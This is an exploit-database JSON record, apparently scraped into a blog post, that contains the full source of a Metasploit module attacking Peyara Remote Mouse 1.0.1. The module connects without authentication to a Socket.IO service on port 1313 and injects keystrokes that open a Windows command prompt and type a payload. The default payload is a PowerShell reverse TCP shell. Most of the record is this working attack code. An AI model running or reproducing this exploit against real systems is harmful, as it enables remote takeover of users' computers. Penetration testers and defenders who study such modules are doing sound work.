{“lastseen”:”2026-06-26T19:36:58″,”description”:”This module exploits an unauthenticated remote code execution vulnerability in Peyara Remote Mouse 1.0.1. The application exposes a Socket.IO WebSocket service on TCP port 1313 and accepts unauthenticated keyboard input events. The module sends…”,”published”:”2026-06-26T19:05:41″,”modified”:”2026-06-26T19:05:41″,”type”:”metasploit”,”title”:”Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-MISC-PEYARA_REMOTE_MOUSE_RCE-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”# frozen_string_literal: true\\n\\n##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n include Rex::Proto::Http::WebSocket\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n # Engine.IO \/ Socket.IO packet types exchanged as plain WebSocket text frames.\\n # See: https:\/\/socket.io\/docs\/v4\/engine-io-protocol\/ and\\n # https:\/\/socket.io\/docs\/v4\/socket-io-protocol\/\\n ENGINEIO_OPEN = ‘0’ # Engine.IO OPEN (handshake) packet\\n ENGINEIO_CLOSE = ‘1’ # Engine.IO CLOSE packet\\n ENGINEIO_PING = ‘2’ # Engine.IO PING packet\\n ENGINEIO_PONG = ‘3’ # Engine.IO PONG packet\\n SOCKETIO_CONNECT = ’40’ # Engine.IO MESSAGE (4) + Socket.IO CONNECT (0)\\n SOCKETIO_EVENT = ’42’ # Engine.IO MESSAGE (4) + Socket.IO EVENT (2)\\n\\n # Fixed delay (seconds) after launching the command prompt, giving the\\n # window time to appear before keystrokes are typed into it.\\n WINDOW_DELAY = 1.0\\n\\n # Peyara serves a single Engine.IO session at a time and keeps a dropped one\\n # alive until its ping timeout, so a fresh connection can briefly fail to get\\n # the OPEN frame. Retry the connect until the previous session is released.\\n CONNECT_RETRIES = 10\\n CONNECT_RETRY_DELAY = 3\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Peyara Remote Mouse 1.0.1 Unauthenticated Remote Code Execution’,\\n ‘Description’ =\\u003e %q{\\n This module exploits an unauthenticated remote code execution vulnerability\\n in Peyara Remote Mouse 1.0.1. The application exposes a Socket.IO\\n WebSocket service on TCP port 1313 and accepts unauthenticated keyboard\\n input events.\\n\\n The module sends keyboard events to open the Windows command prompt and\\n type a Metasploit command payload, allowing arbitrary command execution\\n in the context of the user running Peyara Remote Mouse.\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘tmrswrr’ # Vulnerability discovery, original PoC, and Metasploit module\\n ],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/github.com\/capture0x\/Peyara’],\\n [‘URL’, ‘https:\/\/peyara-remote-mouse.vercel.app\/’]\\n ],\\n ‘DisclosureDate’ =\\u003e ‘2025-05-30’,\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Privileged’ =\\u003e false,\\n ‘Targets’ =\\u003e [\\n [\\n ‘Windows Command’,\\n {\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Arch’ =\\u003e ARCH_CMD\\n }\\n ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 1313,\\n ‘PAYLOAD’ =\\u003e ‘cmd\/windows\/powershell_reverse_tcp’,\\n ‘WfsDelay’ =\\u003e 10\\n },\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION],\\n ‘SideEffects’ =\\u003e [SCREEN_EFFECTS, IOC_IN_LOGS]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘TARGETURI’, [true, ‘Base path for the Socket.IO endpoint’, ‘\/’]),\\n OptFloat.new(‘KEY_DELAY’, [true, ‘Delay between keyboard events in seconds’, 0.06]),\\n OptInt.new(‘WS_TIMEOUT’, [true, ‘Timeout for WebSocket operations in seconds’, 5])\\n ]\\n )\\n end\\n\\n def recv_wstext(wsock)\\n frame = nil\\n\\n begin\\n # TODO: R7 engineers may want a pattern that avoids the Timeout API here.\\n ::Timeout.timeout(datastore[‘WS_TIMEOUT’]) do\\n frame = wsock.get_wsframe\\n end\\n rescue ::Timeout::Error\\n return nil\\n end\\n\\n return nil unless frame\\n\\n frame.unmask! if frame.header.masked == 1\\n frame.payload_data.to_s\\n end\\n\\n # Performs the Socket.IO namespace connect handshake on an open WebSocket and\\n # returns true once the server acknowledges with a CONNECT packet.\\n def socketio_connect(wsock)\\n wsock.put_wstext(SOCKETIO_CONNECT)\\n\\n 3.times do\\n frame = recv_wstext(wsock)\\n next if frame.nil?\\n\\n wsock.put_wstext(ENGINEIO_PONG) if frame == ENGINEIO_PING\\n return true if frame.start_with?(SOCKETIO_CONNECT)\\n end\\n\\n false\\n end\\n\\n # Close the Engine.IO session before dropping the socket. Without the explicit\\n # CLOSE packet the server keeps the session alive until its ping timeout, which\\n # blocks the next connection (for example check() followed by exploit()).\\n def close_session(wsock)\\n return unless wsock\\n\\n begin\\n wsock.put_wstext(ENGINEIO_CLOSE)\\n rescue StandardError\\n nil\\n ensure\\n wsock.wsclose\\n end\\n end\\n\\n def send_event(wsock, event, data)\\n wsock.put_wstext(\\”#{SOCKETIO_EVENT}#{JSON.generate([event, data])}\\”)\\n Rex.sleep(datastore[‘KEY_DELAY’])\\n end\\n\\n def press_key(wsock, key)\\n send_event(wsock, ‘key’, key)\\n end\\n\\n def open_command_prompt(wsock)\\n send_event(wsock, ‘edit-key’, { ‘key’ =\\u003e ‘escape’, ‘modifier’ =\\u003e [‘control’] })\\n Rex.sleep(0.5)\\n\\n %w[c m d enter].each do |key|\\n press_key(wsock, key)\\n end\\n\\n Rex.sleep(WINDOW_DELAY)\\n press_key(wsock, ‘enter’)\\n Rex.sleep(0.5)\\n end\\n\\n # Open a fresh Engine.IO session and return the socket once the server sends\\n # the OPEN frame, retrying while a previous (still lingering) session blocks it.\\n def open_socketio_session\\n CONNECT_RETRIES.times do |attempt|\\n # connect_ws issues the upgrade through send_request_raw, which does not\\n # render vars_get, so the Engine.IO query has to live in the request URI.\\n wsock = connect_ws(‘uri’ =\\u003e \\”#{normalize_uri(target_uri.path, ‘socket.io\/’)}?EIO=4\\u0026transport=websocket\\”)\\n return wsock if recv_wstext(wsock)\\u0026.start_with?(ENGINEIO_OPEN)\\n\\n close_session(wsock)\\n Rex.sleep(CONNECT_RETRY_DELAY) unless attempt == CONNECT_RETRIES – 1\\n end\\n\\n nil\\n end\\n\\n def check\\n wsock = open_socketio_session\\n\\n return CheckCode::Safe(‘The service did not return the expected Socket.IO open frame’) unless wsock\\n\\n # An Engine.IO open frame alone is common to any Socket.IO service, so also\\n # require a successful Socket.IO namespace connect to reduce false positives.\\n return CheckCode::Appears(‘The service completed a Socket.IO namespace connect handshake’) if socketio_connect(wsock)\\n\\n CheckCode::Detected(‘An Engine.IO service is present but did not complete the Socket.IO connect handshake’)\\n rescue Rex::Proto::Http::WebSocket::ConnectionError =\\u003e e\\n CheckCode::Unknown(\\”WebSocket connection failed: #{e.message}\\”)\\n ensure\\n close_session(wsock)\\n end\\n\\n def exploit\\n print_status(‘Connecting to the Socket.IO WebSocket endpoint’)\\n wsock = open_socketio_session\\n fail_with(Failure::Unreachable, ‘The service did not return the expected Socket.IO open frame’) unless wsock\\n\\n fail_with(Failure::UnexpectedReply, ‘The Socket.IO namespace connect was not acknowledged’) unless socketio_connect(wsock)\\n\\n print_status(‘Opening command prompt through remote keyboard events’)\\n open_command_prompt(wsock)\\n\\n command = payload.encoded\\n print_status(\\”Sending payload command (#{command.length} bytes)\\”)\\n\\n # Type the command one character at a time. Batching characters into a single\\n # \\”key\\” event makes the target collapse repeated keys (e.g. \\”ll\\”, \\”dd\\”) and\\n # garble bursts; one event per character (space included, as a literal \\” \\”)\\n # is what types the payload reliably.\\n command.each_char { |ch| press_key(wsock, ch) }\\n\\n Rex.sleep(WINDOW_DELAY)\\n press_key(wsock, ‘enter’)\\n\\n handler\\n rescue Rex::Proto::Http::WebSocket::ConnectionError =\\u003e e\\n fail_with(Failure::Unreachable, \\”WebSocket connection failed: #{e.message}\\”)\\n ensure\\n close_session(wsock)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/misc\/peyara_remote_mouse_rce.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/misc\/peyara_remote_mouse_rce\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-06-26T19:36:58″,”description”:”This module exploits an unauthenticated remote code execution vulnerability in Peyara Remote Mouse 1.0.1. The application exposes a Socket.IO WebSocket service on TCP port 1313…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-66315","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n